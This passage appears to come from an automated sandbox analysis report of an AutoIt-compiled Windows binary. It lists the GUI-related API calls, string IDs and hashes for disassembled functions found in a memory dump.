                    • Instruction Fuzzy Hash: D55193B068430DFB8B04EB20C996D7E77B2EBD63417208215F50AA7392D77DAD41DB62
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: bcad5ac9762413adc9c4dde7aeb7df1db51bab546a7b8fc215a86702fe7b05d1
                    • Instruction ID: a6d3720d941d6454b910e63e1563ccc5b90b5e3bd3985188f295e5ffd69f8109
                    • Opcode Fuzzy Hash: bcad5ac9762413adc9c4dde7aeb7df1db51bab546a7b8fc215a86702fe7b05d1
                    • Instruction Fuzzy Hash: E681FAB0740245FACF24AF70CC86FAE7768EF16740F14C165FD46AA182EB6CDA45D292
                    APIs
                    • GetSysColor.USER32(00000012), ref: 007CAB99
                    • SetTextColor.GDI32(?,?), ref: 007CAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 007CABB3
                    • GetSysColor.USER32(0000000F), ref: 007CABBE
                    • CreateSolidBrush.GDI32(?), ref: 007CABC3
                    • GetSysColor.USER32(00000011), ref: 007CABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CABE9
                    • SelectObject.GDI32(?,00000000), ref: 007CABFA
                    • SetBkColor.GDI32(?,00000000), ref: 007CAC03
                    • SelectObject.GDI32(?,?), ref: 007CAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007CAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007CAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 007CACEC
                    • DrawFocusRect.USER32(?,?), ref: 007CACF7
                    • GetSysColor.USER32(00000011), ref: 007CAD05
                    • SetTextColor.GDI32(?,00000000), ref: 007CAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CAD21
                    • SelectObject.GDI32(?,007CA869), ref: 007CAD38
                    • DeleteObject.GDI32(?), ref: 007CAD43
                    • SelectObject.GDI32(?,?), ref: 007CAD49
                    • DeleteObject.GDI32(?), ref: 007CAD4E
                    • SetTextColor.GDI32(?,?), ref: 007CAD54
                    • SetBkColor.GDI32(?,?), ref: 007CAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: d9d41ff7c66c982270e53f55dc40c8e22c9f9a55e1698b43f17a5d7986be92cc
                    • Instruction ID: 91689055e9667e86bc12c19cfe4fd5247d7bc6201ba908cf6cec8f090c718a26
                    • Opcode Fuzzy Hash: d9d41ff7c66c982270e53f55dc40c8e22c9f9a55e1698b43f17a5d7986be92cc
                    • Instruction Fuzzy Hash: F1614C71900218FFDF119FA8DC48EAE7B7AFB08325F148129F915AB2A1D7799D40DB90
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007C8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8D45
                    • CharNextW.USER32(0000014E), ref: 007C8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007C8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007C8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007C8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 007C8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007C8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C8E8C
                    • _memset.LIBCMT ref: 007C8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007C8EFA
                    • _memset.LIBCMT ref: 007C8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007C8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 007C8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 007C9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007C90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C9121
                    • DrawMenuBar.USER32(?), ref: 007C9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 007C9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 1d7b6136182a4aaebdf43e03b10cde5fdf3988c1748a6d4b344fb7253e5d246f
                    • Instruction ID: e9993ad1e5dae3a8d3fb2ab7da0dbb014ddbfc2cb2a05c27a59d3a93c4e08ff7
                    • Opcode Fuzzy Hash: 1d7b6136182a4aaebdf43e03b10cde5fdf3988c1748a6d4b344fb7253e5d246f
                    • Instruction Fuzzy Hash: 15E17170900219EBDF609F54CC89FEE7BB9EF05710F14815DFA16AA290DB788A81DF61
                    APIs
                    • GetCursorPos.USER32(?), ref: 007C4C51
                    • GetDesktopWindow.USER32 ref: 007C4C66
                    • GetWindowRect.USER32(00000000), ref: 007C4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 007C4CCF
                    • DestroyWindow.USER32(?), ref: 007C4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 007C4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C4D90
                    • IsWindowVisible.USER32(?), ref: 007C4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C4DDF
                    • GetWindowRect.USER32(?,?), ref: 007C4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 007C4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 007C4E37
                    • CopyRect.USER32(?,?), ref: 007C4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 007C4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 80d5c76f2dc5114a0074a7133507d91e1bb3455975c2540be50871ef01c66178
                    • Instruction ID: d993678917c895e525473c84c65e9370b1d09a67b9670c0c95426c1396bf5f54
                    • Opcode Fuzzy Hash: 80d5c76f2dc5114a0074a7133507d91e1bb3455975c2540be50871ef01c66178
                    • Instruction Fuzzy Hash: AAB16A71604340AFDB14DF64C858F6ABBE5BF88310F00891CF599AB2A1D779EC04CBA5
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428BC
                    • GetSystemMetrics.USER32(00000007), ref: 007428C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428EF
                    • GetSystemMetrics.USER32(00000008), ref: 007428F7
                    • GetSystemMetrics.USER32(00000004), ref: 0074291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00742939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00742949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0074297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00742990
                    • GetClientRect.USER32(00000000,000000FF), ref: 007429AE
                    • GetStockObject.GDI32(00000011), ref: 007429CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 007429D5
                      • Part of subcall function 00742344: GetCursorPos.USER32(?), ref: 00742357
                      • Part of subcall function 00742344: ScreenToClient.USER32(008067B0,?), ref: 00742374
                      • Part of subcall function 00742344: GetAsyncKeyState.USER32(00000001), ref: 00742399
                      • Part of subcall function 00742344: GetAsyncKeyState.USER32(00000002), ref: 007423A7
                    • SetTimer.USER32(00000000,00000000,00000028,00741256), ref: 007429FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: b403a725f17bd8bdb2f3695d2758e21da9c7f330c6ac0534ef796cc29afec7fe
                    • Instruction ID: a93ffb20cfc97e6c622b4e1f927b358e87bf48de2ef6c2ec75661251168cad06
                    • Opcode Fuzzy Hash: b403a725f17bd8bdb2f3695d2758e21da9c7f330c6ac0534ef796cc29afec7fe
                    • Instruction Fuzzy Hash: CCB15E7160020ADFDF15DFA8DC45FAE7BB5FB08314F108229FA15E6290DB789861CB55
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007C40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 838b2e7aebfec2dc7f543769839635388885e5bda5d01498b2db8782b59c13a4
                    • Instruction ID: 61b777f3516f51655ca8b0d8d864e210a6c39244e0b539732e330c8c450239b7
                    • Opcode Fuzzy Hash: 838b2e7aebfec2dc7f543769839635388885e5bda5d01498b2db8782b59c13a4
                    • Instruction Fuzzy Hash: BEA17D70214245DBCB14EF20C966F6AB3A5BF85314F14896CB996AB392DB3CEC05CB91
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 007B5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007B5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 007B531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 007B532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007B5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 007B5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 007B534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 007B5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 007B5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 007B536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 007B5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 007B5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 007B538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 007B5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 007B53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 007B53AE
                    • GetCursorInfo.USER32(?), ref: 007B53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 007B53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: 3bd6baab93411cbceeedddd479facaf50876d091d3ed24ec567568d6ea5d8afa
                    • Instruction ID: 73d75bc388e8622abf23c28b849020fdc0e9c918751e147ae64a309c794fe736
                    • Opcode Fuzzy Hash: 3bd6baab93411cbceeedddd479facaf50876d091d3ed24ec567568d6ea5d8afa
                    • Instruction Fuzzy Hash: AB416470E04319AADB109FBA8C49DAFFFF8EF51B50B10452FE509E7290DAB89501CE51
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 0079AAA5
                    • __swprintf.LIBCMT ref: 0079AB46
                    • _wcscmp.LIBCMT ref: 0079AB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079ABAE
                    • _wcscmp.LIBCMT ref: 0079ABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 0079AC21
                    • GetDlgCtrlID.USER32(?), ref: 0079AC73
                    • GetWindowRect.USER32(?,?), ref: 0079ACA9
                    • GetParent.USER32(?), ref: 0079ACC7
                    • ScreenToClient.USER32(00000000), ref: 0079ACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 0079AD48
                    • _wcscmp.LIBCMT ref: 0079AD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 0079AD82
                    • _wcscmp.LIBCMT ref: 0079AD96
                      • Part of subcall function 0076386C: _iswctype.LIBCMT ref: 00763874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 320ea1b688101f89fb3f2eca8631b0e19d2b6340b3c19923d49a5e4ab0b12bba
                    • Instruction ID: a0f27596f4c1d36b532059266c13e320444a8290097d3db8e1ee0fd3ac328848
                    • Opcode Fuzzy Hash: 320ea1b688101f89fb3f2eca8631b0e19d2b6340b3c19923d49a5e4ab0b12bba
                    • Instruction Fuzzy Hash: 1FA1CD71205606FBDB14DF20D888FAAB7A8FF04315F108629F999D2590DB38E945CBE2
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0079B3DB
                    • _wcscmp.LIBCMT ref: 0079B3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0079B414
                    • CharUpperBuffW.USER32(?,00000000), ref: 0079B431
                    • _wcscmp.LIBCMT ref: 0079B44F
                    • _wcsstr.LIBCMT ref: 0079B460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0079B498
                    • _wcscmp.LIBCMT ref: 0079B4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0079B4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0079B518
                    • _wcscmp.LIBCMT ref: 0079B528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0079B550
                    • GetWindowRect.USER32(00000004,?), ref: 0079B5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 69a483b88a16039578f2af807fab20f9f76743a13e60b8f44304d6ca7bf611ec
                    • Instruction ID: 686a0ac636d709b17d96384d5b5dde76c9c648565408fb2d6f70d318d29365bd
                    • Opcode Fuzzy Hash: 69a483b88a16039578f2af807fab20f9f76743a13e60b8f44304d6ca7bf611ec
                    • Instruction Fuzzy Hash: 50818F710083459BDF04DF10EA85FAA7BE8EF44714F04856DFD859A0A2DB38ED49CB61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 51dea079ef1eb7eef47b273e32297ce46d64fa3cf3a2ac2e5a7f86758ab125a8
                    • Instruction ID: 5a40fda26a8863b09595ce7ae16c89703ac14fe8e8bb1c41e8ead0388cf2bfd8
                    • Opcode Fuzzy Hash: 51dea079ef1eb7eef47b273e32297ce46d64fa3cf3a2ac2e5a7f86758ab125a8
                    • Instruction Fuzzy Hash: 2F315E71A44209E6DF18FB60EE47EBE7764EF10750F600129F641B11D2EF6D6E04C951
                    APIs
                    • LoadIconW.USER32(00000063), ref: 0079C4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0079C4E6
                    • SetWindowTextW.USER32(?,?), ref: 0079C4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 0079C512
                    • SetWindowTextW.USER32(00000000,?), ref: 0079C518
                    • GetDlgItem.USER32(?,000003E9), ref: 0079C528
                    • SetWindowTextW.USER32(00000000,?), ref: 0079C52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0079C54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079C569
                    • GetWindowRect.USER32(?,?), ref: 0079C572
                    • SetWindowTextW.USER32(?,?), ref: 0079C5DD
                    • GetDesktopWindow.USER32 ref: 0079C5E3
                    • GetWindowRect.USER32(00000000), ref: 0079C5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0079C636
                    • GetClientRect.USER32(?,?), ref: 0079C643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0079C668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0079C693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 15098a8b72aabe614fb530b8928e515f05e32f2bca90002591bcb74a7f3daa01
                    • Instruction ID: d333748493a8348589abd6db8c0af52846d3e6e1b42cdffecd7589d6caa4b92b
                    • Opcode Fuzzy Hash: 15098a8b72aabe614fb530b8928e515f05e32f2bca90002591bcb74a7f3daa01
                    • Instruction Fuzzy Hash: 62514A70A00709AFDF219FA8DD89F6EBBB5FB04705F10492CE686A25A0C778A914CB54
                    APIs
                    • _memset.LIBCMT ref: 007CA4C8
                    • DestroyWindow.USER32(?,?), ref: 007CA542
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA5F1
                    • DestroyWindow.USER32(00000000), ref: 007CA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00740000,00000000), ref: 007CA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA663
                    • GetDesktopWindow.USER32 ref: 007CA67C
                    • GetWindowRect.USER32(00000000), ref: 007CA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CA6B3
